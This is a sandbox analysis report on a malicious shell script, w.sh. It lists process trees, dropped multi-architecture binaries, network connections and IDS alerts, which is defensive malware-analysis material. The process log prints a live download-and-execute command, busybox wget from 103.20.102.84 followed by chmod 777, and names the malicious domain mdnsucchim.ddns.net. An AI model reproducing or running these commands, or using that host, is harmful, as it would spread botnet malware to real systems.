File name:

w.sh

Full analysis: https://app.any.run/tasks/5c5e586b-d9f1-490e-9a63-d91e0de37bb7
Verdict: Malicious activity
Analysis date: June 21, 2025, 19:43:49
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

396BE5DD80636E9A5563A5F894D91DAB

SHA1:

DDA1862873FCB1241BBD80AB3DE8E1DB44314E98

SHA256:

9A32074C005D55480203CAF16641126D9F33FD7CE6694749F269AF09BBF00731

SSDEEP:

24:XQgAL7+NI75eKghgimDla85EstBld76aoHA:AgO7H5eLhgieY8mSld7nog

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • x86 (PID: 41458)
      • x86 (PID: 41457)
      • busybox (PID: 41464)
      • busybox (PID: 41465)
      • busybox (PID: 41467)
      • x86_64 (PID: 41476)
      • x86_64 (PID: 41469)
      • x86_64 (PID: 41475)
      • x86_64 (PID: 41474)

  • SUSPICIOUS

    • Starts itself from another location

      • x86 (PID: 41457)

    • Executes commands using command-line interpreter

      • sudo (PID: 41396)
      • bash (PID: 41397)

    • Modifies file or directory owner

      • sudo (PID: 41393)

    • Connects to the server without a host name

      • busybox (PID: 41399)
      • busybox (PID: 41403)
      • busybox (PID: 41414)
      • busybox (PID: 41418)
      • busybox (PID: 41426)
      • busybox (PID: 41422)
      • busybox (PID: 41431)
      • busybox (PID: 41435)
      • busybox (PID: 41439)
      • busybox (PID: 41450)
      • busybox (PID: 41466)
      • busybox (PID: 41443)

    • Potential Corporate Privacy Violation

      • busybox (PID: 41399)
      • busybox (PID: 41403)
      • busybox (PID: 41414)
      • busybox (PID: 41418)
      • busybox (PID: 41422)
      • busybox (PID: 41426)
      • busybox (PID: 41431)
      • busybox (PID: 41435)
      • busybox (PID: 41443)
      • busybox (PID: 41439)
      • busybox (PID: 41450)
      • busybox (PID: 41466)

    • Executes the "rm" command to delete files or directories

      • x86 (PID: 41458)
      • dash (PID: 41470)
      • bash (PID: 41397)

    • Connects to unusual port

      • x86_64 (PID: 41474)
      • busybox (PID: 41464)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
196
Monitored processes
63
Malicious processes
5
Suspicious processes
12

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs busybox chmod no specs bash no specs busybox tracker-extract-3 no specs chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox tracker-extract-3 no specs chmod no specs x86 no specs x86 no specs busybox busybox rm no specs mkdir no specs mv no specs chmod no specs dash no specs busybox no specs busybox no specs chmod no specs x86_64 no specs dash no specs rm no specs mkdir no specs chmod no specs x86_64 bash no specs rm no specs x86_64 no specs x86_64 no specs

Process information

PID
CMD
Path
Indicators
Parent process
41392/bin/sh -c "sudo chown user /tmp/w\.sh && chmod +x /tmp/w\.sh && DISPLAY=:0 sudo -iu user /tmp/w\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
root
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41393sudo chown user /tmp/w.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41394chown user /tmp/w.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41395chmod +x /tmp/w.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41396sudo -iu user /tmp/w.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41397-bash --login -c \/tmp\/w\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41398/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41399busybox wget http://103.20.102.84/arm/usr/bin/busybox
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
41400chmod 777 arm/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41401-bash --login -c \/tmp\/w\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Executable files
0
Suspicious files
12
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
41399busybox/home/user/armbinary
MD5:
SHA256:
41403busybox/home/user/arm5binary
MD5:
SHA256:
41414busybox/home/user/arm6binary
MD5:
SHA256:
41418busybox/home/user/arm7binary
MD5:
SHA256:
41422busybox/home/user/m68kbinary
MD5:
SHA256:
41426busybox/home/user/mipsbinary
MD5:
SHA256:
41431busybox/home/user/mpslbinary
MD5:
SHA256:
41435busybox/home/user/ppcbinary
MD5:
SHA256:
41439busybox/home/user/sh4binary
MD5:
SHA256:
41443busybox/home/user/spcbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
51
DNS requests
41
Threats
44

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
41399
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/arm
unknown
unknown
GET
204
185.125.190.17:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
41403
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/arm5
unknown
unknown
41414
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/arm6
unknown
unknown
41422
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/m68k
unknown
unknown
41426
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/mips
unknown
unknown
41418
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/arm7
unknown
unknown
41431
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/mpsl
unknown
unknown
41435
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/ppc
unknown
unknown
41439
busybox
GET
200
103.20.102.84:80
http://103.20.102.84/sh4
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
212.102.56.178:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
185.125.190.17:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41399
busybox
103.20.102.84:80
mdnsucchim.ddns.net
malicious
41403
busybox
103.20.102.84:80
mdnsucchim.ddns.net
malicious
41414
busybox
103.20.102.84:80
mdnsucchim.ddns.net
malicious

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.184.238
  • 2a00:1450:4001:831::200e
whitelisted
odrs.gnome.org
  • 212.102.56.178
  • 207.211.211.26
  • 195.181.175.40
  • 169.150.255.180
  • 37.19.194.81
  • 169.150.255.183
  • 195.181.170.19
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
whitelisted
connectivity-check.ubuntu.com
  • 185.125.190.17
  • 185.125.190.98
  • 185.125.190.49
  • 185.125.190.96
  • 185.125.190.18
  • 185.125.190.97
  • 91.189.91.98
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.48
  • 91.189.91.48
  • 91.189.91.97
  • 2620:2d:4000:1::98
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::2b
  • 2001:67c:1562::24
  • 2001:67c:1562::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::22
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2a
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.57
  • 185.125.188.58
  • 185.125.188.54
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::117
whitelisted
7.100.168.192.in-addr.arpa
unknown
mdnsucchim.ddns.net
  • 103.20.102.84
malicious

Threats

PID
Process
Class
Message
41399
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41403
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41414
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41418
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41422
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41426
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41431
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41435
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41439
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41443
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info